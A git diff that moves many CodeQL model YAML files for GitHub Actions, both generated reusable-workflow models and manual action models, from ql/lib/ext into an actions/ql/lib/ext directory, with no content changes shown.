diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
diff --git a/ql/lib/ext/manual/8398a7_action-slack.model.yml b/actions/ql/lib/ext/manual/8398a7_action-slack.model.yml
similarity index 100%
rename from ql/lib/ext/manual/8398a7_action-slack.model.yml
rename to actions/ql/lib/ext/manual/8398a7_action-slack.model.yml
diff --git a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml b/actions/ql/lib/ext/manual/AsasInnab_regex-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/AsasInnab_regex-action.model.yml
rename to actions/ql/lib/ext/manual/AsasInnab_regex-action.model.yml
diff --git a/ql/lib/ext/manual/MeilCli_regex-match.model.yml b/actions/ql/lib/ext/manual/MeilCli_regex-match.model.yml
similarity index 100%
rename from ql/lib/ext/manual/MeilCli_regex-match.model.yml
rename to actions/ql/lib/ext/manual/MeilCli_regex-match.model.yml
diff --git a/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml b/actions/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml
rename to actions/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml
diff --git a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml b/actions/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml
similarity index 100%
rename from ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml
rename to actions/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml
diff --git a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml b/actions/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml
similarity index 100%
rename from ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml
rename to actions/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml
diff --git a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml b/actions/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml
similarity index 100%
rename from ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml
rename to actions/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml
diff --git a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml b/actions/ql/lib/ext/manual/ab185508_file-type-finder.model.yml
similarity index 100%
rename from ql/lib/ext/manual/ab185508_file-type-finder.model.yml
rename to actions/ql/lib/ext/manual/ab185508_file-type-finder.model.yml
diff --git a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml b/actions/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml
similarity index 100%
rename from ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml
rename to actions/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml
diff --git a/ql/lib/ext/manual/actions_github-script.model.yml b/actions/ql/lib/ext/manual/actions_github-script.model.yml
similarity index 100%
rename from ql/lib/ext/manual/actions_github-script.model.yml
rename to actions/ql/lib/ext/manual/actions_github-script.model.yml
diff --git a/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml b/actions/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml
similarity index 100%
rename from ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml
rename to actions/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml
diff --git a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml b/actions/ql/lib/ext/manual/akefirad_loadenv-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/akefirad_loadenv-action.model.yml
rename to actions/ql/lib/ext/manual/akefirad_loadenv-action.model.yml
diff --git a/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml b/actions/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml
similarity index 100%
rename from ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml
rename to actions/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml
diff --git a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml b/actions/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
similarity index 100%
rename from ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
rename to actions/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
diff --git a/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml b/actions/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml
similarity index 100%
rename from ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml
rename to actions/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml
diff --git a/ql/lib/ext/manual/anchore_sbom-action.model.yml b/actions/ql/lib/ext/manual/anchore_sbom-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/anchore_sbom-action.model.yml
rename to actions/ql/lib/ext/manual/anchore_sbom-action.model.yml
diff --git a/ql/lib/ext/manual/anchore_scan-action.model.yml b/actions/ql/lib/ext/manual/anchore_scan-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/anchore_scan-action.model.yml
rename to actions/ql/lib/ext/manual/anchore_scan-action.model.yml
diff --git a/ql/lib/ext/manual/andresz1_size-limit-action.model.yml b/actions/ql/lib/ext/manual/andresz1_size-limit-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/andresz1_size-limit-action.model.yml
rename to actions/ql/lib/ext/manual/andresz1_size-limit-action.model.yml
diff --git a/ql/lib/ext/manual/android-actions_setup-android.model.yml b/actions/ql/lib/ext/manual/android-actions_setup-android.model.yml
similarity index 100%
rename from ql/lib/ext/manual/android-actions_setup-android.model.yml
rename to actions/ql/lib/ext/manual/android-actions_setup-android.model.yml
diff --git a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml b/actions/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml
similarity index 100%
rename from ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml
rename to actions/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml
diff --git a/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml b/actions/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml
similarity index 100%
rename from ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml
rename to actions/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml
diff --git a/ql/lib/ext/manual/appleboy_ssh-action.model.yml b/actions/ql/lib/ext/manual/appleboy_ssh-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/appleboy_ssh-action.model.yml
rename to actions/ql/lib/ext/manual/appleboy_ssh-action.model.yml
